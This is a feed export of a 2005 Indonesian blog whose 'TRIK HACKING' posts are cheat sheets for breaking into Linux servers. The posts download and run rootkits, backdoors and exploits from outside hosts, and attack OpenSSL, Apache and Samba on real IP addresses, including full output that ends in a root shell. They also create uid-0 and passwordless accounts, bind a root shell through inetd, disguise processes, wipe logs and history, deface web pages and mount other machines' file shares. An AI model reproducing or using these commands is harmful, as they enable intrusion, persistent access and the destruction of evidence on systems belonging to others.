http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz&lt;br /&gt;ls -al&lt;br /&gt;tar -zxvf tk.tgz&lt;br /&gt;cd tk&lt;br /&gt;./t0rn kuntua 7000&lt;br /&gt;&lt;br /&gt;--------------------------------------------&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933621948246153?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933621948246153/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933621948246153&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933621948246153'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933621948246153'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-6-hacking.html' title='TRIK 6 HACKING'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933611164734000</id><published>2005-02-25T19:54:00.000+07:00</published><updated>2005-02-25T19:55:11.653+07:00</updated><title type='text'>TRIK 5 HACIKNG</title><content type='html'>=================================================================================================&lt;br /&gt;wget http://brutalside.host.sk/tools/term&lt;br /&gt;chmod +x term&lt;br /&gt;./term lonthe123&lt;br /&gt;=================================================================================================&lt;br /&gt;wget http://brutalside.host.sk/tools/ftp.tgz&lt;br /&gt;gunzip ftp.tgz&lt;br /&gt;gzip ftp.tar&lt;br /&gt;tar -zxvf ftp.tar.gz&lt;br /&gt;cd ftp&lt;br /&gt;./scan 163 22 10&lt;br /&gt;./scan 163 22 10 163&lt;br /&gt;=================================================================================================&lt;br /&gt;scan port dgn pscan.c ==&gt; www.packetstormsecurity.nl&lt;br /&gt;bila port:23 vurnerable bisa running exploit&lt;br /&gt;wget http://phaty.org/7350854_c.txt&lt;br /&gt;mv 7350854_c.txt 7350854.c&lt;br /&gt;gcc -o 7350854 7350854.c&lt;br /&gt;./7350854 IP&lt;br /&gt;./7350854 216.89.24.213&lt;br /&gt;=================================================================================================&lt;br /&gt;http://brutalside.host.sk/tools/kik&lt;br /&gt;chmod +x kik&lt;br /&gt;./kik "-bash" ./psybnc&lt;br /&gt;=================================================================================================&lt;br /&gt;&lt;br /&gt;=================================================================================================&lt;br /&gt;find / -name wtmp -print&lt;br /&gt;find / -name utmp -print&lt;br /&gt;find / -name lastlog -print&lt;br /&gt;whereis wtmp&lt;br /&gt;whereis utmp&lt;br /&gt;whereis lastlog&lt;br /&gt;===================&lt;br /&gt;/usr/sbin/useradd -d /home/apache -s /bin/ksh apache&lt;br /&gt;passwd apache&lt;br /&gt;Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan&lt;br /&gt;wget www.norifumiya.org/r.c&lt;br /&gt;gcc -o sh r.c&lt;br /&gt;rm -rf r.v&lt;br /&gt;rm -rf r.c&lt;br /&gt;chown 0:0 /tmp/sh&lt;br /&gt;chmod 777 sh &lt;br /&gt;Sampai disini kita selesai dengan permainan di server target root&lt;br /&gt;Sekarang kita kembali ke user dan ketik :&lt;br /&gt;./sh &lt;br /&gt;nah, apa yg terjadi setelah kita jalankan command ./sh...? &lt;br /&gt;yg terjadi adalah uid dan gid kita adalah 0 :)&lt;br /&gt;=================================================================================================&lt;br /&gt;wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz&lt;br /&gt;tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz&lt;br /&gt;cd psybnc&lt;br /&gt;echo "PSYBNC.SYSTEM.PORT1=60000" &gt;&gt; psybnc.conf&lt;br /&gt;echo "PSYBNC.SYSTEM.HOST1=*" &gt;&gt; psybnc.conf&lt;br /&gt;echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" &gt;&gt; psybnc.conf&lt;br /&gt;./psybnc psybnc.conf&lt;br /&gt;=================================================================================================&lt;br /&gt;wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz&lt;br /&gt;mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log&lt;br /&gt;mv psybnc "syslogd "&lt;br /&gt;echo "PSYBNC.SYSTEM.PORT1=60000" &gt;&gt; psybnc.conf&lt;br /&gt;echo "PSYBNC.SYSTEM.HOST1=*" &gt;&gt; psybnc.conf&lt;br /&gt;echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" &gt;&gt; psybnc.conf&lt;br /&gt;mv psybnc.conf " " ; pwd&lt;br /&gt;PATH=$PATH:/var/tmp/" "/.log/&lt;br /&gt;"syslogd " " "&lt;br /&gt;mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud&lt;br /&gt;=================================================================================================&lt;br /&gt;+Command Mapache2x&lt;br /&gt;- ./mapache RangeIP (mis: ./mapache 200 443 10 10) &lt;&lt; Scan&lt;br /&gt;- ./apache IPTarget (Mis: ./apache 202.11159.67.176)&lt;br /&gt;==================================&lt;br /&gt;+Command MassApache&lt;br /&gt;- ./massossl RangeIP (mis: ./massossl 22200 443 10 10) &lt;&lt; Scan&lt;br /&gt;- ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176)&lt;br /&gt;================================================&lt;br /&gt;+FTP Command 4 RooT&lt;br /&gt;&lt;br /&gt;- ./scan No Depan IP Target (Mis: ./scannn 210 21 10)&lt;br /&gt;&lt;br /&gt;=addUser=&lt;br /&gt;uid=0(root) gid=0(root) groups=50(ftp)&lt;br /&gt;Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow&lt;br /&gt;&lt;br /&gt;adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter, &lt;br /&gt;buat password ketik passwd kuntua enter , &lt;br /&gt;abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita&lt;br /&gt;&lt;br /&gt;Changing password for user ganjen&lt;br /&gt;passwd: all authentication tokens updated successfully&lt;br /&gt;&lt;br /&gt;berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah..&lt;br /&gt;&lt;br /&gt;kalo mau dapet acces root ketik :&lt;br /&gt;&lt;br /&gt;/usr/sbin/useradd bash -u 0 -d /&lt;br /&gt;&lt;br /&gt;abis itu ketik lagi&lt;br /&gt;&lt;br /&gt;passwd -d bash&lt;br /&gt;&lt;br /&gt;apus jejak &lt;br /&gt;cd /&lt;br /&gt;rm -f /.bash_history /root/.bash_history /var/log/messages&lt;br /&gt;ln -s /dev/null /root/.bash_history&lt;br /&gt;touch /var/log/messages&lt;br /&gt;chmod 600 /var/log/messages&lt;br /&gt;rm -rf /var/log/lastlog&lt;br /&gt;cat &gt; /var/log/lastlog&lt;br /&gt;&lt;br /&gt;udah di ketik semua ? udahh... tekan ctrl d . &lt;br /&gt;=================================&lt;br /&gt;+Backdoor&lt;br /&gt;NEWCOMER FREZZ BackDooR&lt;br /&gt;- wget manadocarding.info/charles; chmod 755 charles; ./charles&lt;br /&gt;= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root&lt;br /&gt;- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000&lt;br /&gt;= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000&lt;br /&gt;&lt;br /&gt;***** ADD USER SHELL *****&lt;br /&gt;/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon&lt;br /&gt;passwd -d yrfon&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933611164734000?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933611164734000/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933611164734000&amp;isPopup=true' title='2 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933611164734000'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933611164734000'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-5-hacikng.html' title='TRIK 5 HACIKNG'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933601194245287</id><published>2005-02-25T19:53:00.000+07:00</published><updated>2005-02-25T19:53:31.946+07:00</updated><title type='text'>TRIK 4 HACKING</title><content type='html'>=================================================================================================&lt;br /&gt;OPENSSL-TOO-OPEN&lt;br /&gt;=================================================================================================&lt;br /&gt;./openssl -a 0x15 -v 61.220.53.91&lt;br /&gt;: openssl-too-open : OpenSSL remote exploit&lt;br /&gt;by Solar Eclipse &lt;solareclipse@phreedom.org&gt;&lt;br /&gt;&lt;br /&gt;: Opening 30 connections&lt;br /&gt;Establishing SSL connections&lt;br /&gt;&lt;br /&gt;-&gt; ssl_connect_host&lt;br /&gt;-&gt; ssl_connect_host&lt;br /&gt;-&gt; ssl_connect_host&lt;br /&gt;-&gt; ssl_connect_host&lt;br /&gt;: Using the OpenSSL info leak to retrieve the addresses&lt;br /&gt;-&gt; send_client_hello&lt;br /&gt;-&gt; get_server_hello&lt;br /&gt;-&gt; send_client_master_key&lt;br /&gt;-&gt; generate_session_keys&lt;br /&gt;-&gt; get_server_verify&lt;br /&gt;-&gt; send_client_finished&lt;br /&gt;-&gt; get_server_finished&lt;br /&gt;ssl0 : 0x80e1638&lt;br /&gt;-&gt; send_client_hello&lt;br /&gt;-&gt; get_server_hello&lt;br /&gt;-&gt; send_client_master_key&lt;br /&gt;-&gt; generate_session_keys&lt;br /&gt;-&gt; get_server_verify&lt;br /&gt;-&gt; send_client_finished&lt;br /&gt;-&gt; get_server_finished&lt;br /&gt;ssl1 : 0x80e1638&lt;br /&gt;-&gt; send_client_hello&lt;br /&gt;-&gt; get_server_hello&lt;br /&gt;-&gt; send_client_master_key&lt;br /&gt;-&gt; generate_session_keys&lt;br /&gt;-&gt; get_server_verify&lt;br /&gt;-&gt; send_client_finished&lt;br /&gt;-&gt; get_server_finished&lt;br /&gt;ssl2 : 0x80e1638&lt;br /&gt;&lt;br /&gt;: Sending shellcode&lt;br /&gt;-&gt; send_client_hello&lt;br /&gt;-&gt; get_server_hello&lt;br /&gt;ciphers: 0x80e1638 start_addr: 0x80e1578 SHELLCODE_OFS: 208&lt;br /&gt;-&gt; send_client_master_key&lt;br /&gt;-&gt; generate_session_keys&lt;br /&gt;-&gt; get_server_verify&lt;br /&gt;-&gt; send_client_finished&lt;br /&gt;-&gt; get_server_error&lt;br /&gt;Execution of stage1 shellcode succeeded, sending stage2&lt;br /&gt;Spawning shell...&lt;br /&gt;&lt;br /&gt;bash: no job control in this shell&lt;br /&gt;bash-2.05$&lt;br /&gt;bash-2.05$ uname -a;id&lt;br /&gt;bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586&lt;br /&gt;bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown&lt;br /&gt;bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)&lt;br /&gt;=================================================================================================&lt;br /&gt;: MARI KITA MAINKAN ROOTNYA :&lt;br /&gt;=================================================================================================&lt;br /&gt;unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0&lt;br /&gt;cd /tmp ; mkdir ... ; cd ....&lt;br /&gt;wget www.geocities.com/lifron/local.tar.gz&lt;br /&gt;tar -zxvf local.tar.gz&lt;br /&gt;cd local&lt;br /&gt;./lconfex -p&lt;br /&gt;./lconfex -f&lt;br /&gt;./handy.sh 0xbffff625 0xbffff5f1&lt;br /&gt;&lt;br /&gt;GOT IT! Your magic number is : 792&lt;br /&gt;Now create a dir 'segfault.eng' and touch a file named 'segfault.eng' in it.&lt;br /&gt;Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792" to get rootshell&lt;br /&gt;&lt;br /&gt;*hint* : try play with -b &lt;n&gt; if not succeed. [ n = 0..4 ]&lt;br /&gt;ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1&lt;br /&gt;&lt;br /&gt;Good Luck d0inks!&lt;br /&gt;&lt;br /&gt;mkdir segfault.eng; touch segfault.eng/segfault.eng&lt;br /&gt;./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792&lt;br /&gt;id&lt;br /&gt;uid=0(root) gid=48(apache) groups=48(apache)&lt;br /&gt;=================================================================================================&lt;br /&gt;/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails&lt;br /&gt;echo "apache::0:0::/mails:/bin/bash" &gt;&gt; /etc/passwd&lt;br /&gt;passwd -d mails &lt;br /&gt;Changing password for user mails&lt;br /&gt;Removing password for user mails&lt;br /&gt;passwd: Success&lt;br /&gt;login ke shell&lt;br /&gt;last | grep mails&lt;br /&gt;su apache&lt;br /&gt;mkdir /var/tmp/" "&lt;br /&gt;cd /var/tmp/" "&lt;br /&gt;wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c&lt;br /&gt;gcc -o r remove.c -DGENERIC&lt;br /&gt;./remove /home/mails&lt;br /&gt;wget www.radikal.org/backdoor.tar.gz&lt;br /&gt;tar xzf backdoor.tar.gz&lt;br /&gt;./setup 35b4tud1n91n 7788&lt;br /&gt;/usr/sbin/userdel -r mails&lt;br /&gt;/usr/sbin/userdel -r apache&lt;br /&gt;cd /var/tmp/" " &lt;== del semua tools&lt;br /&gt;test shell with port 7788 and password 35b4tud1n91n&lt;br /&gt;=================================================================================================&lt;br /&gt;[Langkah Hapus Log I]&lt;br /&gt;=================================================================================================&lt;br /&gt;export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 &lt;br /&gt;=================================================================================================&lt;br /&gt;[Langkah Hapus Log I]&lt;br /&gt;=================================================================================================&lt;br /&gt;rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r &lt;br /&gt;=================================================================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933601194245287?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933601194245287/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933601194245287&amp;isPopup=true' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933601194245287'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933601194245287'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-4-hacking.html' title='TRIK 4 HACKING'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933593027182125</id><published>2005-02-25T19:51:00.000+07:00</published><updated>2005-02-25T19:52:10.276+07:00</updated><title type='text'>TRIK 3 HACKING</title><content type='html'>=================================================================================================&lt;br /&gt;1. wget www.geocities.com/lifron/openssl.tar.gz&lt;br /&gt;2. tar -zxvf openssl.tar.gz&lt;br /&gt;3. ./ssl IP&lt;br /&gt;./ssl 204.145.119.253&lt;br /&gt;=================================================================================================&lt;br /&gt;1. wget www.geocities.com/lifron/massapache.tar.gz&lt;br /&gt;2. tar -zxvf massapache.tar.gz&lt;br /&gt;3. cd massapache&lt;br /&gt;4. ./massossl 211 443 10&lt;br /&gt;=================================================================================================&lt;br /&gt;1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz&lt;br /&gt;2. tar -zxvf openssl-too-open.tar.gz&lt;br /&gt;3. cd openssl-too-open&lt;br /&gt;4. ./openssl-too-open&lt;br /&gt;./openssl-too-open -a 0x15 -v 212.70.224.129 &lt;br /&gt;=================================================================================================&lt;br /&gt;1. wget www.geocities.com/lifron/shv4.tar.gz&lt;br /&gt;2. tar xzf shv4.tar.gz&lt;br /&gt;3. cd shv4&lt;br /&gt;4. ./setup port passwd&lt;br /&gt;./setup 7788 35b4tu&lt;br /&gt;=================================================================================================&lt;br /&gt;1. wget http://www.geocities.com/lifron/massplor.tar.gz&lt;br /&gt;2. tar -zxvf massplor.tar.gz&lt;br /&gt;3. cd massplo&lt;br /&gt;4. ./massplo IP -d 8&lt;br /&gt;./massplo 210.10 -d 8&lt;br /&gt;=================================================================================================&lt;br /&gt;1. wget www.geocities.com/lifron/mapache2x.gz&lt;br /&gt;2. tar -zxvf mapache2x.gz &lt;br /&gt;3. cd slamet&lt;br /&gt;4. ./apache 208.134.131.49&lt;br /&gt;./massossl 80 443 13&lt;br /&gt;./mapache 443 210.10&lt;br /&gt;=================================================================================================&lt;br /&gt;1. wget http://phaty.org/ptrace-kmod.c.txt&lt;br /&gt;2. mv ptrace-kmod.c.txt ptrace-kmod.c&lt;br /&gt;3. gcc -o ptrace-kmod ptrace-kmod.c&lt;br /&gt;4. ./ptrace-kmod&lt;br /&gt;=================================================================================================&lt;br /&gt;1. wget http://netric.org/exploit/sambal.c&lt;br /&gt;2. gcc -o sambal sambal.c&lt;br /&gt;3. ./sambal -d 0 -C 60 -S IP &lt;== scanning&lt;br /&gt;./sambal -d 0 -C 60 -S IP | grep samba&lt;br /&gt;./sambal -b 0 -v IP &lt;=== attack&lt;br /&gt;=================================================================================================&lt;br /&gt;SecureCRT: http://www.vandyke.com/ &lt;br /&gt;TTSSH: http://www.zip.com.au/~roca/ttssh.html &lt;br /&gt;PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html &lt;br /&gt;SecureShell: http://public.srce.hr/~cigaly/ssh/ &lt;br /&gt;=================================================================================================&lt;br /&gt;DEFACE&lt;br /&gt;=================================================================================================&lt;br /&gt;find index.html&lt;br /&gt;whereis index.html&lt;br /&gt;locate index.html&lt;br /&gt;default :&lt;br /&gt;cd /var/www/html&lt;br /&gt;echo "KuNTuA Was Here" &gt; index.html&lt;br /&gt;=================================================================================================&lt;br /&gt;cd /home&lt;br /&gt;mkdir apache&lt;br /&gt;cd apache&lt;br /&gt;mkdir public_html&lt;br /&gt;chmod 705 public_html&lt;br /&gt;cd public_html&lt;br /&gt;mv index.html mnc.html&lt;br /&gt;echo "KuNTuA Was Here" &gt; mnc.html&lt;br /&gt;untuk mentesnya :&lt;br /&gt;http://IP-yg-kamu-hack/~apache&lt;br /&gt;=================================================================================================&lt;br /&gt;Install WGET&lt;br /&gt;=================================================================================================&lt;br /&gt;1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya&lt;br /&gt;2. ketik: ftp ftp.rpmfind.net&lt;br /&gt;3. login : anonymous&lt;br /&gt;4. cd linux/redhat/updates/7.0/en/os/&lt;br /&gt;5. cd i386&lt;br /&gt;6. get wget-1.8.2-4.70.i386.rpm&lt;br /&gt;7. quit dari ftp&lt;br /&gt;8. Proses Peng-Instalan &lt;br /&gt;rpm -ivh wget-1.8.2-4.70.i386.rpm&lt;br /&gt;http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&amp;submit=Search+...&amp;system=redhat&amp;arch=&lt;br /&gt;=================================================================================================&lt;br /&gt;wget http://202.158.16.157/ssh.diff&lt;br /&gt;wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz&lt;br /&gt;tar -zxvf openssh-3.5p1.tar.gz&lt;br /&gt;cp ssh.diff openssh-3.5p1.tar.gz&lt;br /&gt;cd openssh-3.5p1&lt;br /&gt;patch -p &lt; ssh.diff&lt;br /&gt;./configure&lt;br /&gt;make ssh&lt;br /&gt;./ssh -l root &lt;ip&gt; &lt;br /&gt;./ssh -l root 66.136.37.101&lt;br /&gt;./ssh -l root 66.149.178.214&lt;br /&gt;=================================================================================================&lt;br /&gt;: COMMAND ADDUSER :&lt;br /&gt;=================================================================================================&lt;br /&gt;/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua&lt;br /&gt;/usr/sbin/useradd tondano -u 0 -d /&lt;br /&gt;passwd -d kuntua &lt;br /&gt;Changing password for user kuntua&lt;br /&gt;Removing password for user kuntua&lt;br /&gt;passwd: Success&lt;br /&gt;passwd -d tondano&lt;br /&gt;Changing password for user tondano&lt;br /&gt;Removing password for user tondano&lt;br /&gt;passwd: Success&lt;br /&gt;=================================================================================================&lt;br /&gt;passwd kuntua&lt;br /&gt;New UNIX password: kuntua75&lt;br /&gt;Retype new UNIX password: kuntua75&lt;br /&gt;Changing password for user kuntua&lt;br /&gt;passwd: all authentication tokens updated successfully&lt;br /&gt;password tondano&lt;br /&gt;New UNIX password: kuntua75&lt;br /&gt;Retype new UNIX password: kuntua75&lt;br /&gt;Changing password for user tondano&lt;br /&gt;passwd: all authentication tokens updated successfully&lt;br /&gt;=================================================================================================&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11073134-110933593027182125?l=neoyudhax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://neoyudhax.blogspot.com/feeds/110933593027182125/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=11073134&amp;postID=110933593027182125&amp;isPopup=true' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933593027182125'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11073134/posts/default/110933593027182125'/><link rel='alternate' type='text/html' href='http://neoyudhax.blogspot.com/2005/02/trik-3-hacking.html' title='TRIK 3 HACKING'/><author><name>y u d h a x</name><uri>http://www.blogger.com/profile/11288479023899701739</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-11073134.post-110933585063664850</id><published>2005-02-25T19:49:00.000+07:00</published><updated>2005-02-25T19:50:50.643+07:00</updated><title type='text'>TRIK 2 HACKING</title><content type='html'>=================================================================================================&lt;br /&gt;BIKIN BACKDOOR&lt;br /&gt;=================================================================================================&lt;br /&gt;echo "kuntua 1979/tcp" &gt;&gt; /etc/services&lt;br /&gt;echo "dial stream tcp nowait root /bin/sh sh -i" &gt;&gt; /etc/inetd.conf kill -HUP 135&lt;br /&gt;telnet dengan port "1979"&lt;br /&gt;=================================================================================================&lt;br /&gt;http://www.rocketpunch-ent.com/masslpd.tar &lt;br /&gt;http://www.rocketpunch-ent.com/bindscan.c&lt;br /&gt;http://www.rocketpunch-ent.com/lucstatdx.c&lt;br /&gt;=================================================================================================&lt;br /&gt;[root@gila /]#rpm -qa | grep samba&lt;br /&gt;&lt;br /&gt;samba-client-2.0.7-36&lt;br /&gt;samba-2.0.7-36&lt;br /&gt;samba-common-2.0.7-36&lt;br /&gt;&lt;br /&gt;[root@gila /]# arp -n&lt;br /&gt;&lt;br /&gt;Address HWtype HWaddress Flags Mask Iface&lt;br /&gt;192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1&lt;br /&gt;192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1&lt;br /&gt;192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1&lt;br /&gt;192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1&lt;br /&gt;192.168.0.3 ether 00:10:5A:71:17:E3 C eth1&lt;br /&gt;192.168.0.1 ether 00:00:21:28:8C:47 C eth1&lt;br /&gt;&lt;br /&gt;[root@gila /]# nmblookup -d2 '*' #untuk mendeteksi netbios &lt;br /&gt;&lt;br /&gt;Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )&lt;br /&gt;Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )&lt;br /&gt;Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )&lt;br /&gt;Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )&lt;br /&gt;Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )&lt;br /&gt;&lt;br /&gt;[root@gila /]# locate findsmb&lt;br /&gt;/usr/bin/findsmb&lt;br /&gt;&lt;br /&gt;[root@router /]# findsmb&lt;br /&gt;&lt;br /&gt;IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION&lt;br /&gt;-----------------------------------------&lt;br /&gt;192.168.0.1 CYBER1 [CYBER]&lt;br /&gt;192.168.0.2 CYBER2 [CYBER]&lt;br /&gt;192.168.0.3 CYBER3 [CYBER]&lt;br /&gt;192.168.0.4 CYBER4 [CYBER]&lt;br /&gt;192.168.0.5 CYBER5 [CYBER]&lt;br /&gt;&lt;br /&gt;[root@gila /]# mkdir /mnt/samba&lt;br /&gt;[root@gila /]# smbclient -L CYBER5&lt;br /&gt;Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )&lt;br /&gt;Password:&lt;br /&gt;Sharename Type Comment&lt;br /&gt;--------- ---- -------&lt;br /&gt;A Disk&lt;br /&gt;C Disk&lt;br /&gt;D Disk&lt;br /&gt;E Disk&lt;br /&gt;IPC$ IPC Remote Inter Process Communication&lt;br /&gt;&lt;br /&gt;[root@gila /]# smbmount //cyber5/d /mnt/samba/&lt;br /&gt;Password:&lt;br /&gt;[root@gila /]#&lt;br /&gt;[root@gila /]# cd /mnt/samba/&lt;br /&gt;&lt;br /&gt;[root@router samba]# ls&lt;br /&gt;ffastun.ffa ffastun.ffo install RECYCLED&lt;br /&gt;ffastun0.ffx ffastun.ffl film win98&lt;br /&gt;&lt;br /&gt;[root@gila samba]# cd film/&lt;br /&gt;[root@gila film]# ls&lt;br /&gt;Amy_Lindsay_Forbidden_Sins_01[1].mpeg&lt;br /&gt;=================================================================================================&lt;br /&gt;bash# tar -zxvf grabbb-0.1.0.tar.gz&lt;br /&gt;bash# cd grabbb&lt;br /&gt;bash# gcc -o grabbb grabbb.c&lt;br /&gt;bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23&lt;br /&gt;=================================================================================================&lt;br /&gt;gcc sco-pop.c -o sco-pop&lt;br /&gt;./sco-pop www.target.com&lt;br /&gt;/var/adm&lt;br /&gt;=================================================================================================&lt;br /&gt;: BERSIHKAN LOG :&lt;br /&gt;=================================================================================================&lt;br /&gt;ctlog -&gt; /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog&lt;br /&gt;messages -&gt; /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages&lt;br /&gt;sulog -&gt; /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog&lt;br /&gt;syslog -&gt; /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog&lt;br /&gt;utmp -&gt; /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp&lt;br /&gt;utmpx -&gt; /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx&lt;br /&gt;wtmp -&gt; /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp&lt;br /&gt;wtmpx -&gt; /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx&lt;br /&gt;=================================================================================================&lt;br /&gt;securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org&lt;br /&gt;=================================================================================================&lt;br /&gt;repsec.com|iss.net|checkpoint.com|infowar.com| &lt;br /&gt;=================================================================================================&lt;br /&gt;li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org &lt;br /&gt;=================================================================================================&lt;br /&gt;harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu| &lt;br /&gt;=================================================================================================&lt;br 